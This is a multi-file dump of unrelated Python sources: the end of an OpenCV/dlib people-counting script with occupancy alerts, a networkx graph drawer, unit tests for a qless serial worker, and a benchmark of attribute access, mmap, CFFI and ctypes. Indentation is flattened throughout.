# if we are supposed to be writing a video to disk, initialize
# the writer
if args["output"] is not None and var.writer is None:
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
var.writer = cv2.VideoWriter(args["output"], fourcc, 30,
(var.W, var.H), True)
# initialize the current status along with our list of bounding
# box rectangles returned by either (1) our object detector or
# (2) the correlation trackers
status = "Waiting"
rects = []
if config.five_mins == True:
if datetime.datetime.now() >= var.fivemin:
enterp=info[1][1]
exitp=info[0][1]
send_req(enterp,exitp)
now = datetime.datetime.now()
var.fivemin = now + datetime.timedelta(0,300)
if config.people_change == True:
if len(peoplechangelist) >= 2:
if peoplechangelist[-1] != peoplechangelist[-2]:
enterp=info[1][1]
exitp=info[0][1]
print(peoplechangelist)
send_req(enterp,exitp)
if len(peoplechangelist) > 2:
del peoplechangelist[:-2]
# loop over frames from the video stream
# grab the next frame and handle if we are reading from either
# VideoCapture or VideoStream
# check to see if we should run a more computationally expensive
# object detection method to aid our tracker
if var.totalFrames % args["skip_frames"] == 0:
# set the status and initialize our new set of object trackers
status = "Detecting"
var.trackers = []
# convert the frame to a blob and pass the blob through the
# network and obtain the detections
blob = cv2.dnn.blobFromImage(frame, 0.007843, (var.W, var.H), 127.5)
net.setInput(blob)
detections = net.forward()
# loop over the detections
for i in np.arange(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated
# with the prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections by requiring a minimum
# confidence
if confidence > args["confidence"]:
# extract the index of the class label from the
# detections list
idx = int(detections[0, 0, i, 1])
# if the class label is not a person, ignore it
if CLASSES[idx] != "person":
continue
# compute the (x, y)-coordinates of the bounding box
# for the object
box = detections[0, 0, i, 3:7] * np.array([var.W, var.H, var.W, var.H])
(startX, startY, endX, endY) = box.astype("int")
# construct a dlib rectangle object from the bounding
# box coordinates and then start the dlib correlation
# tracker
tracker = dlib.correlation_tracker()
rect = dlib.rectangle(startX, startY, endX, endY)
tracker.start_track(rgb, rect)
# add the tracker to our list of trackers so we can
# utilize it during skip frames
var.trackers.append(tracker)
# otherwise, we should utilize our object *trackers* rather than
# object *detectors* to obtain a higher frame processing throughput
else:
# loop over the trackers
for tracker in var.trackers:
# set the status of our system to be 'tracking' rather
# than 'waiting' or 'detecting'
status = "Tracking"
# update the tracker and grab the updated position
tracker.update(rgb)
pos = tracker.get_position()
# unpack the position object
startX = int(pos.left())
startY = int(pos.top())
endX = int(pos.right())
endY = int(pos.bottom())
# add the bounding box coordinates to the rectangles list
rects.append((startX, startY, endX, endY))
# draw the configured counting line on the frame; once an
# object crosses this line we will determine whether they were
# moving 'up'/'down' (or 'left'/'right')
cv2.line(frame, (int(round(x1)), int(round(y1))), (int(round(x2)), int(round(y2))), (0, 0, 255), 3)
#iterlist=createLineIterator(np.array([0, round(H * 0.50)]),np.array([W, round(H * 0.66)]),frame)
#print(len(iterlist))
cv2.putText(frame, "-Prediction border - Entrance-", (10, var.H - ((i * 20) + 200)),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
# use the centroid tracker to associate the (1) old object
# centroids with (2) the newly computed object centroids
objects = var.ct.update(rects)
# loop over the tracked objects
for (objectID, centroid) in objects.items():
# check to see if a trackable object exists for the current
# object ID
to = var.trackableObjects.get(objectID, None)
# if there is no existing trackable object, create one
if to is None:
to = TrackableObject(objectID, centroid)
# otherwise, there is a trackable object so we can utilize it
# to determine direction
else:
# the difference between the y-coordinate of the *current*
# centroid and the mean of *previous* centroids will tell
# us in which direction the object is moving (negative for
# 'up' and positive for 'down')
if vertical_direction == 1:
y = [c[1] for c in to.centroids]
#print(y)
#direction = centroid[1] - np.mean(y)
direction = 0
to.centroids.append(centroid)
#print(to.centroids)
direction_all=[]
if len(y) >= 40:
# sum of xi - mean(xi-1)
#try
#direction_all=[]
for index,i in enumerate(y[-41:]):
prev_mean= np.mean(y[:index+1])
direc= i - prev_mean
direction_all.append(direc)
if all([x > 0 for x in direction_all]):
direction = 1
elif all([x < 0 for x in direction_all]):
direction = -1
else:
direction = 0
#except
else:
y = [c[0] for c in to.centroids]
#print(y)
#direction = centroid[1] - np.mean(y)
direction = 0
to.centroids.append(centroid)
#print(to.centroids)
direction_all=[]
if len(y) >= 40:
# sum of xi - mean(xi-1)
#try
#direction_all=[]
for index,i in enumerate(y[-41:]):
prev_mean= np.mean(y[:index+1])
direc= i - prev_mean
direction_all.append(direc)
if all([x > 0 for x in direction_all]):
# right
direction = 1
elif all([x < 0 for x in direction_all]):
#left
direction = -1
else:
direction = 0
# check to see if the object has been counted or not
if not to.counted:
if centroid[0] < iterlist[0][0] or centroid[0] > iterlist[-1][0]:
pass
elif m == 1000000001 and (centroid[1] < iterlist[0][1] or centroid[1] > iterlist[-1][1]):
pass
if m < 0 and vertical_direction == 1:
# if the direction is negative (indicating the object
# is moving up) AND the centroid is above the center
# line, count the object
# Note: image y coordinates grow downward, so a larger y value sits lower in the frame.
#if direction < 0 and centroid[1] < int(round(H * 0.66)):
#print(str(centroid))
if direction < 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going up' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'up':
check_exceed(var.x,frame)
break
# if the direction is positive (indicating the object
# is moving down) AND the centroid is below the
# center line, count the object
#elif direction > 0 and centroid[1] > int(round(H * 0.66)):
elif direction > 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going down' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'down':
check_exceed(var.x,frame)
break
#print(empty1[-1])
# if the people limit exceeds over threshold, send an email alert
elif m == 0 and vertical_direction == 1:
if direction < 0:
for i in iterlist:
if centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going up' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'up':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going down' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'down':
check_exceed(var.x,frame)
break
elif 0 < m < 1000000000 and vertical_direction == 1:
if direction < 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going up' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'up':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going down' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'down':
check_exceed(var.x,frame)
break
elif m < 0 and vertical_direction == 0:
# if the direction is negative (indicating the object
# is moving LEFT) AND the centroid is on the left side
# line, count the object
if direction < 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] > i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going left' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'left':
check_exceed(var.x,frame)
break
# if the direction is positive (indicating the object
# is moving RIGHT) AND the centroid is on the right side
# line, count the object
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] < i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going right' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'right':
check_exceed(var.x,frame)
break
elif m >= 1000000000 and vertical_direction == 0:
# m is infinite/ vertical line
if direction < 0:
for i in iterlist:
if centroid[0] < i[0]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going left' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'left':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going right' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'right':
check_exceed(var.x,frame)
break
elif 0 < m < 1000000000 and vertical_direction == 0:
if direction < 0:
for i in iterlist:
if centroid[0] < i[0] and centroid[1] < i[1]:
var.totalUp += 1
var.empty.append(var.totalUp)
to.counted = True
print('ID '+ str(to.objectID) + ' going left' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'left':
check_exceed(var.x,frame)
break
elif direction > 0:
for i in iterlist:
if centroid[0] > i[0] and centroid[1] > i[1]:
var.totalDown += 1
var.empty1.append(var.totalDown)
to.counted = True
print('ID '+ str(to.objectID) + ' going right' + ' direction : ' + str(direction) + ' centroid : ' + str(centroid) + ' pixel compared to : ' + str(i[0]) + ' ' + str(i[1]))
if enter_direction == 'right':
check_exceed(var.x,frame)
break
var.x = []
# compute the sum of total people inside
if enter_direction == 'down' or enter_direction == 'right':
var.x.append(len(var.empty1)-len(var.empty))
else:
var.x.append(len(var.empty)-len(var.empty1))
#print("Total people inside:", x)
# store the trackable object in our dictionary
var.trackableObjects[objectID] = to
#print(peoplechangelist)
# draw both the ID of the object and the centroid of the
# object on the output frame
text = "ID {}".format(objectID)
cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
cv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)
# construct a tuple of information we will be displaying on the frame
if enter_direction == 'down' or enter_direction == 'right':
info = [
("Exit", var.totalUp),
("Enter", var.totalDown),
("Status", status),
]
else:
info = [
("Exit", var.totalDown),
("Enter", var.totalUp),
("Status", status),
]
info2 = [
("Total people inside", var.x),
]
if config.people_change == True:
#if len(peoplechangelist) > 0:
peoplechangelist.append(var.x)
try:
assert objectID
assert centroid
text = "ID {}".format(objectID)
cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
cv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)
except (AssertionError,ValueError,NameError):
pass
try:
if int(info2[0][1][0]) >= config.Threshold:
cv2.putText(frame, "-ALERT: People limit exceeded-", (10, frame.shape[0] - 80),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255), 2)
if config.ALERT:
if var.do_malier == 1:
print("[INFO] Sending email alert..")
try:
Mailer().send(config.MAIL)
except:
var.do_malier = 0
print("[INFO] Alert sent")
except IndexError:
pass
# Display the output
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, var.H - ((i * 20) + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 2)
for (i, (k, v)) in enumerate(info2):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (265, var.H - ((i * 20) + 60)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)
# Initiate a simple log to save data at end of the day
if config.Log:
try:
timeinxmins
except NameError:
timeinxmins=datetime.datetime.now() + config.timedel
if datetime.datetime.now() >= timeinxmins:
#data={'Location':config.cam_place,'People Enter':info[1][1],'People Exit':info[0][1],'Current People Inside':info2[0][1],'Date':datetime.datetime.now()}
#df=pd.DataFrame(data=data)
timeinxmins=datetime.datetime.now() + config.timedel
cam_place=str(args["camera"])
excel_name=f"./summary/{cam_place} summary.xlsx"
if exists(excel_name):
#with pd.ExcelWriter(excel_name,mode='a') as writer:
#append_df_to_excel(excel_name, df,header=None, index=False)
data_converter(info[1][1],info[0][1],excel_name)
else:
create_summary(info[1][1],info[0][1],excel_name)
print('summary exported!')
# check to see if we should write the frame to disk
if var.writer is not None:
var.writer.write(frame)
# show the output frame
cv2.imshow("Real-Time Monitoring/Analysis Window", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# increment the total number of frames processed thus far and
# then update the FPS counter
var.totalFrames += 1
fps.update()
if config.Timer:
# Automatic timer to stop the live stream. Set to 8 hours (28800s).
t1 = time.time()
num_seconds=(t1-t0)
if num_seconds > 28800:
break
if config.Scheduler:
if datetime.datetime.now() >= var.tmr :
print('renew program')
os.execv(sys.executable, ['python'] + sys.argv)
# stop the timer and display FPS information
fps.stop()
print("[INFO] elapsed time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# # if we are not using a video file, stop the camera video stream
# if not args.get("input", False):
# vs.stop()
#
# # otherwise, release the video file pointer
# else:
# vs.release()
# issue 15
#if config.Thread:
#vs.release()
# close any open windows
cv2.destroyAllWindows()
# Custom wrapper class that runs the capture and tracking loops as processes
class MyThread():
# Keep a reference to the shared frame queue; run() starts the worker processes
def __init__(self,q_arg):
self.q=q_arg
def run(self):
# Variable that stores the exception, if raised by someFunction
self.exc = None
try:
self.cam_process = Process(target=capture, args=(self.q,))
self.think_process = Process(target=tracker_peo, args=(self.q,))
self.cam_process.start()
self.think_process.start()
except IndexError as e:
self.exc = e
def join(self):
self.cam_process.join()
self.think_process.join()
# Since join() returns in caller thread
# we re-raise the caught exception
# if any was caught
if self.exc:
raise self.exc
def terminate(self):
self.cam_process.terminate()
self.think_process.terminate()
q= Queue()
thread1= MyThread(q)
def start_thread():
q= Queue()
thread=MyThread(q)
thread.run()
try:
thread.join()
except:
print('start thread error')
raise KeyboardInterrupt
def stop_thread():
pass
##learn more about different schedules here: https://pypi.org/project/schedule/
if __name__ == '__main__':
q= Queue()
if config.Scheduler:
##Runs for every 1 second
#global tmr
#tmr=datetime.datetime.now()
schedule.every(1).seconds.do(start_thread)
##Runs at every day (9:00 am). You can change it.
#schedule.every().day.at("9:00").do(run)
while 1:
#var.tmr=datetime.datetime.now()
try:
#tmr=tmr.replace(day=tmr.day + 1, hour=21, minute=12, second=0, microsecond=0)
var.tmr=var.tmr.replace(day=var.tmr.day + 1, hour=0, minute=0, second=0, microsecond=0)
except ValueError:
try:
var.tmr=var.tmr.replace(month=var.tmr.month + 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
except ValueError:
var.tmr=var.tmr.replace(year= var.tmr.year + 1 ,month= 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
#print(tmr)
#print(datetime.datetime.now())
#try:
schedule.run_pending()
if datetime.datetime.now() >= var.tmr:
print('renew outer program')
raise ValueError
#except:
#print('schedule error')
#continue
#else:
#run()
|
GraphDrawer.py
|
import time
import threading
import networkx as nx
import matplotlib.pyplot as plt
def draw_graph(e):
one_thr = threading.Thread(target=_draw_graph, args=(e,)) # pass the function and its argument so it runs in the new thread
one_thr.start()
return one_thr
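# Added note: most matplotlib GUI backends only display windows from the main
# thread, so calling plt.show() from the worker thread started here may not show a
# figure reliably; the __main__ block below calls _draw_graph directly instead.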
def _draw_graph(e):
g = nx.Graph()
g.add_weighted_edges_from(e)
pos = nx.spring_layout(g)
nx.draw(g, pos, node_size=15, with_labels=True)
edge_labels = nx.get_edge_attributes(g, 'weight')
nx.draw_networkx_edge_labels(g, pos, edge_labels, font_size=6)
# nx.draw_networkx_labels(g, pos)
plt.show()
if __name__ == '__main__':
edges = []
with open('CARP_samples/gdb1.dat', 'r') as file:
for i in range(9):
file.readline()
line = file.readline()
while line.strip() != 'END':
edges.append(list(map(int, line.split()[:-1])))
print(list(map(int, line.split()[:-1])))
line = file.readline()
_draw_graph(edges)
|
test_serial.py
|
'''Test the serial worker'''
# Internal imports
from common import TestQless
import time
from threading import Thread
# The stuff we're actually testing
from qless import logger
from qless.workers.serial import SerialWorker
class SerialJob(object):
'''Dummy class'''
@staticmethod
def foo(job):
'''Dummy job'''
time.sleep(job.data.get('sleep', 0))
try:
job.complete()
except:
logger.exception('Unable to complete job %s' % job.jid)
class Worker(SerialWorker):
'''A worker that limits the number of jobs it runs'''
def jobs(self):
'''Yield only a few jobs'''
generator = SerialWorker.jobs(self)
for _ in xrange(5):
yield generator.next()
def kill(self, jid):
'''We'll push a message to redis instead of falling on our sword'''
self.client.redis.rpush('foo', jid)
raise KeyboardInterrupt()
def signals(self):
'''Do not set any signal handlers'''
pass
class NoListenWorker(Worker):
'''A worker that just won't listen'''
def listen(self, _):
'''Don't listen for lost locks'''
pass
class TestWorker(TestQless):
'''Test the worker'''
def setUp(self):
TestQless.setUp(self)
self.queue = self.client.queues['foo']
self.thread = None
def tearDown(self):
if self.thread:
self.thread.join()
TestQless.tearDown(self)
def test_basic(self):
'''Can complete jobs in a basic way'''
jids = [self.queue.put(SerialJob, {}) for _ in xrange(5)]
NoListenWorker(['foo'], self.client, interval=0.2).run()
states = [self.client.jobs[jid].state for jid in jids]
self.assertEqual(states, ['complete'] * 5)
def test_jobs(self):
'''The jobs method yields None if there are no jobs'''
worker = NoListenWorker(['foo'], self.client, interval=0.2)
self.assertEqual(worker.jobs().next(), None)
def test_sleeps(self):
'''Make sure the client sleeps if there aren't jobs to be had'''
for _ in xrange(4):
self.queue.put(SerialJob, {})
before = time.time()
NoListenWorker(['foo'], self.client, interval=0.2).run()
self.assertGreater(time.time() - before, 0.2)
def test_lost_locks(self):
'''The worker should be able to stop processing if need be'''
jid = [self.queue.put(SerialJob, {'sleep': 0.1}) for _ in xrange(5)][0]
self.thread = Thread(
target=Worker(['foo'], self.client, interval=0.2).run)
self.thread.start()
# Now, we'll timeout one of the jobs and ensure that kill is invoked
while self.client.jobs[jid].state != 'running':
time.sleep(0.01)
self.client.jobs[jid].timeout()
self.assertEqual(self.client.redis.brpop('foo', 1), ('foo', jid))
def test_kill(self):
'''Should be able to fall on its sword if need be'''
worker = SerialWorker([], self.client)
worker.jid = 'foo'
thread = Thread(target=worker.kill, args=(worker.jid,))
thread.start()
thread.join()
self.assertFalse(thread.is_alive())
def test_kill_dead(self):
'''If we've moved on to another job, say so'''
# If this tests runs to completion, it has succeeded
worker = SerialWorker([], self.client)
worker.kill('foo')
def test_shutdown(self):
'''We should be able to shutdown a serial worker'''
# If this test finishes, it passes
worker = SerialWorker([], self.client, interval=0.1)
worker.stop()
worker.run()
|
prop.py
|
import time
import sys
import os
import traceback
try:
import cPickle
except ImportError:
import pickle as cPickle
try:
xrange
except NameError:
xrange = range
try:
from shinken.objects.host import Host
except ImportError:
Host = None
from multiprocessing.sharedctypes import Value, Array
from ctypes import c_bool, c_wchar_p, c_long
def print_title(title):
print("\n\n")
print("#" * 60)
print("TITLE: %s" % title)
print("#" * 60)
def print_timed_entry(title, N, ref_time):
elapsed_time = time.time() - ref_time
print("\t%-25s: (%d loops) => %.3f seconds (%10.4f M/s)" % (title, N, elapsed_time, (N / elapsed_time) / 1000000.0))
def share_memory_mapping():
print_title('share memory mapping')
#### Share memory mapping
import mmap
import ctypes
import struct
P = '/dev/shm/blabla.txt'
total_size = 100 * 1000000 # 100 MB
bloc_size = 100 * mmap.PAGESIZE
# write a simple example file
with open(P, "wb") as f:
f.write(b"\x00" * total_size)
f = open(P, 'r+b')
bufs = []
N = int(total_size / bloc_size)
print("Will allocate %dK with %d blocks (%d bytes per block) " % (total_size / 1024, N, bloc_size))
t0 = time.time()
for i in xrange(N):
to_open = f.fileno()
buf = mmap.mmap(to_open, bloc_size, mmap.MAP_SHARED, mmap.PROT_WRITE)
bufs.append(buf)
try:
i = ctypes.c_int.from_buffer(buf)
except TypeError: # in pypy 5
print("PYPY detected, skip this test")
return
# Set a value
i.value = 10
# And manipulate it for kicks
i.value += 1
assert i.value == 11
offset = struct.calcsize(i._type_)
# The offset should be uninitialized ('\x00')
# print buf[offset]
# assert buf[offset] == '\x00'
# Now create a string containing 'foo' by first creating a c_char array
s_type = ctypes.c_char * len('foo')
# Now create the ctypes instance
s = s_type.from_buffer(buf, offset)
# And finally set it
s.raw = b'foo'
new_i = struct.unpack('i', buf[:4])
new_s = struct.unpack('3s', buf[4:7])
# print "I", new_i, "S", new_s
d = time.time() - t0
print("Time to map and read/write %d blocks in /dev/shm: %.3f (%.1f ops/s)" % (N, d, N / d))
# Try fork job
buf = mmap.mmap(-1, bloc_size, mmap.MAP_SHARED, mmap.PROT_WRITE)
bufs.append(buf)
i = ctypes.c_int.from_buffer(buf)
# Set a value
i.value = 10
pid = os.fork()
if pid == 0: # son
time.sleep(1)
i = ctypes.c_int.from_buffer(buf)
print("(in the son) i.value is ", i.value)
sys.exit(0)
else: # father
i.value = 9999
time.sleep(2)
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
class AutoProperties(type):
def __new__(cls, name, bases, dct):
# First map integer properties
for (prop_raw, v) in dct['int_properties'].items():
prop = '_' + prop_raw
def protected(prop):
def __get(self):
# return self._y # ==> 3.5s
return getattr(self, prop) # ==> 4.4s
return __get
get = protected(prop)
def protected(prop):
def __set(self, v):
# print "SET", prop, v
setattr(self, prop, v) # use the bound parameter (not the loop variable) to avoid late binding
return __set
set = protected(prop)
dct[prop_raw] = property(get, set)
return type.__new__(cls, name, bases, dct)
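# Illustrative effect of the metaclass above (derived from the code): for
# int_properties = {'x': 1} it installs a property named 'x' whose getter reads
# self._x and whose setter writes self._x, so after __init__ sets self._x = 1 both
# o.x and o._x return 1; the @property definitions for b1 below do the same thing
# by hand for the boolean attributes.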
@add_metaclass(AutoProperties)
class OOO(object):
# __metaclass__ = AutoProperties
int_properties = {'x': 1, 'y': 1}
bool_properties = {'b1': True, 'b2': True}
def __init__(self):
self._x = 1
self._y = 1
self._b1 = True
self._b2 = True
@property
def b1(self):
return self._b1
@b1.setter
def b1(self, v):
self._b1 = v
'''
@property
def y(self):
return self._y
@y.setter
def y(self, v):
self._y = v
'''
'''
def getY(self):
return self._y
def setY(self, v):
self._y = v
y = property(getY, setY)
'''
from cffi import FFI
ffi = FFI()
ffi.cdef('''
typedef struct FOO FOO;
struct FOO {
int prop1;
int prop2;
int prop3;
int prop4;
int prop5;
int prop6;
int prop7;
int prop8;
int prop9;
int prop10;
};
void FOO_set_prop1(FOO*, int);
''')
# ffi.set_source("_example",
# r"""
# void FOO_set_prop1(FOO* self, int v){
# self->prop1 = v;
# }
# """)
try:
Clib = None
Clib = ffi.verify(
r'''
typedef struct FOO FOO;
struct FOO {
int prop1;
int prop2;
int prop3;
int prop4;
int prop5;
int prop6;
int prop7;
int prop8;
int prop9;
int prop10;
};
void FOO_set_prop1(FOO* self, int v){
self->prop1 = v;
};
'''
)
except Exception as exp:
print('ERROR CFFI: %s' % traceback.format_exc())
# ffi.compile()
print("CLib", Clib)
def bench_host_creation_with_attr():
################## Bench host creation with setattr/getattr/hasattr
print_title("Bench host creation with attr")
'''
def testBit(int_type, offset):
mask = 1 << offset
return(int_type & mask)
def setBit(int_type, offset):
mask = 1 << offset
return(int_type | mask)
N = 10000000
for pos in [20, 256]:
t0 = time.time()
mask = 1 << pos
for i in xrange(N):
f = 0
#print "Set pos %d" % pos
b = f | mask
#print "Is set?", testBit(f, pos)
#print type(f)
print "Pos:%d %.2f" % (pos, time.time() - t0)
'''
if Host is None:
print("Shinken is not installed, skip this test")
return
# Hack fill default, by setting values directly to class
cls = Host
for prop, entry in cls.properties.items():
if entry.has_default:
v = entry.pythonize(entry.default)
setattr(cls, prop, v)
# print "Pop: %s => %s" % (prop, v)
delete_bool = False
delete_running = False
lst = []
p1 = 0.0
p2 = 0.0
p3 = 0.0
p4 = 0.0
N = 40000
print("Number of elements", N)
for i in xrange(N):
t0 = time.time()
h = Host({'host_name': 'blablacar', 'address': '127.0.0.%d' % i, 'active_checks_enabled': '1'})
p1 += (time.time() - t0)
# print h.__dict__
# print h.active_checks_enabled
t0 = time.time()
# h.fill_default()
p2 += (time.time() - t0)
# print h.__dict__
# print h.active_checks_enabled
t0 = time.time()
h.pythonize()
p3 += (time.time() - t0)
# print h.__dict__
# print h.passive_checks_enabled
t0 = time.time()
nb_delete = 0
nb_fields = 0
properties = Host.properties
for (k, e) in properties.items():
nb_fields += 1
if not hasattr(h, k):
continue
elif delete_bool:
if isinstance(getattr(h, k), bool):
delattr(h, k)
# pass
nb_delete += 1
for (k, e) in Host.running_properties.items():
nb_fields += 1
if not hasattr(h, k):
continue
elif delete_running:
delattr(h, k)
continue
elif delete_bool:
if isinstance(getattr(h, k), bool):
delattr(h, k)
# pass
nb_delete += 1
# print cPickle.dumps(h, 0)
p4 += (time.time() - t0)
# print "Deleted: %d / %d total" % (nb_delete, nb_fields)
lst.append(h)
t0 = time.time()
buf = cPickle.dumps(lst, 2)
print("TIME pickle %.2f len=%d" % (time.time() - t0, len(buf)))
print("Phases: create=%.2f default=%.2f pythonize=%.2f clean=%.2f" % (p1, p2, p3, p4))
def bench_getattr_hasattr():
    ################## Bench getattr/hasattr and attribute access
    print_title("Bench getattr/hasattr and attribute access")
N = 1000000
print("############ CFFI")
if Clib is None:
        print('CLib is None, skipping this test')
return
FOO_set_prop1 = Clib.FOO_set_prop1
struct_obj = ffi.new("FOO*")
class CFFISurClass(object):
def __init__(self):
self.struct_obj = ffi.new("FOO*")
cffi_sur_class = CFFISurClass()
t0 = time.time()
for i in xrange(N):
struct_obj.prop1 = 33
print_timed_entry('CFFI: struct.prop1', N, t0)
t0 = time.time()
for i in xrange(N):
cffi_sur_class.struct_obj.prop1 = 33
print_timed_entry('CFFI: CLASS->struct.x', N, t0)
t0 = time.time()
for i in xrange(N):
FOO_set_prop1(struct_obj, 33)
print_timed_entry('CFFI: f(struct*, value)', N, t0)
o = OOO()
print("############ Getattr & hasattr")
t0 = time.time()
for i in xrange(N):
try:
getattr(o, 'blabla')
except AttributeError as exp:
pass
print_timed_entry('Get+try', N, t0)
t0 = time.time()
for i in xrange(N):
hasattr(o, 'blabla')
print_timed_entry('hasattr', N, t0)
####### Integers
x = o._x
N = 1000000
# rr = range(N)
def rr():
return xrange(N)
print("############ Integers")
t0 = time.time()
for i in rr():
v = o.x
assert (v == 1)
print_timed_entry('@Property access', N, t0)
t0 = time.time()
for i in rr():
v = o._x
assert (v == 1)
print_timed_entry('Direct access _x', N, t0)
t0 = time.time()
for i in rr():
v = o.__dict__['_x']
assert (v == 1)
print_timed_entry('Direct __dict__ access', N, t0)
code = compile('v = o._x', '<string>', 'exec')
t0 = time.time()
for i in rr():
exec (code, locals())
assert (v == 1)
print_timed_entry('Compile+Exec', N, t0)
t0 = time.time()
for i in rr():
v = getattr(o, '_x')
assert (v == 1)
print_timed_entry('Getattr _x', N, t0)
print("############ Python Booleans with bitmask")
o._b1 = True
t0 = time.time()
for i in rr():
v = o.b1
print_timed_entry('@property', N, t0)
# print "\tProperty: FOR N: %d => %.2f" % (N, time.time() - t0)
'''
def testBit(int_type, offset):
mask = 1 << offset
return(int_type & mask)
def setBit(int_type, offset):
mask = 1 << offset
return(int_type | mask)
def clearBit(int_type, offset):
mask = ~(1 << offset)
return(int_type & mask)
'''
b = 0
offset = 5
mask = 1 << offset
b = b | mask
t0 = time.time()
for i in rr():
v = (b & mask) != 0
assert (v is True)
print_timed_entry('Raw', N, t0)
t0 = time.time()
for i in rr():
v = o.__dict__['_b1']
assert (v is True)
print_timed_entry('__dict__', N, t0)
print("############## ctypes booleans")
import ctypes
c_uint8 = ctypes.c_uint8
class Flags_bits(ctypes.LittleEndianStructure):
_fields_ = [
("f1", c_uint8, 1), # asByte & 1
("f2", c_uint8, 1), # asByte & 2
("f3", c_uint8, 1), # asByte & 4
("f4", c_uint8, 1), # asByte & 8
]
class Flags(ctypes.Union):
_anonymous_ = ("bit",)
_fields_ = [
("bit", Flags_bits),
("asByte", c_uint8)
]
flags = Flags()
flags.asByte = 0x2 # ->0010
'''
print( "logout: %i" % flags.bit.f1 )
# `bit` is defined as anonymous field, so its fields can also be accessed directly:
print( "f1: %i" % flags.bit.f1 )
print( "f2: %i" % flags.bit.f2 )
print( "f3 : %i" % flags.bit.f3 )
print( "f4 : %i" % flags.bit.f4 )
'''
t0 = time.time()
for i in rr():
v = flags.bit.f2
assert (v == 1)
print_timed_entry('Raw', N, t0)
# print "\tRaw : FOR N: %d => %.2f" % (N, time.time() - t0)
t0 = time.time()
for i in rr():
v = getattr(flags.bit, 'f2')
assert (v == 1)
print_timed_entry('getattr', N, t0)
# print "\tGetattr : FOR N: %d => %.2f" % (N, time.time() - t0)
code = compile('v = flags.bit.f2', '<string>', 'exec')
